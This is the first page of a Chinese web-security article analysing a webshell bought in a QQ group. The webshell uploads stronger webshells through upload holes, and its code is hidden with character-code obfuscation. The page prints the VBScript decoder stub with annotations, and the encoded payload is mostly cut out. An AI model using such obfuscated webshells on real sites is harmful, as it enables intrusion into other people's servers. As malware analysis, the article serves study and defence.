WEB开发网
开发学院网络安全黑客技术 实例:对某ASC加密网马的破解和利用 阅读

实例:对某ASC加密网马的破解和利用

 2008-06-03 16:48:29 来源:WEB开发网   
核心提示:QQ群中,有人在叫卖网马,实例:对某ASC加密网马的破解和利用,网友花钱获得一个共享给我,让我看看,依次累加,UBound是数组的维数,于是有了下面的这篇文章, 1.网马初探在浏览器中打开网马

QQ群中,有人在叫卖网马。网友花钱获得一个共享给我,让我看看。于是有了下面的这篇文章。

1.网马初探

在浏览器中打开网马,这个网马的功能比较简单,主要用来上传功能更强的网马。比较有特色的是可以在目标网页的上传漏洞,自己修改修改配置。查看该网马的源代码,发现该网马加密了,很明显是用ASC加密。(图1)

实例:对某ASC加密网马的破解和利用

2.网马分析

虽然该网马的核心功能代码进行ASC加密了,但其框架一目了然。其代码及其解释如下:

<scriptlanguage=vbscript>
'可以看到该网马是一个VB脚本
functionrechange(k)
'定义了一个rechange函数,该函数定义了一个变量k
s=Split(k,",")
'split的作用是把k以“,”分开,把其定义为一个数组
t=""
给t赋空值;
Fori=0ToUBound(s)
t=t+Chrw(eval(s(i)))
用for进行循环转换,把t值转换为字符,依次累加。UBound是数组的维数,Chrw是字符转换函数。
Next
rechange=t
把t返回到函数
EndFunction
t="60,33,68,79,67,84,89,80,69,32,104,116,109,108,32,80,85,66,76,73,67,32,34,45,47,47,87,51,67,47,47,68,84,68,32,88,72,84,77,76,32,49,46,48,32,84,114,97,110,115,105,116,105,111,110,97,108,47,......"
'中间省略N多,这就是网马的功能代码
document.writerechange(t)
'在浏览器中输出函数值
</script> 

3.网马解密

1 2 3  下一页

Tags:实例 ASC 加密

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接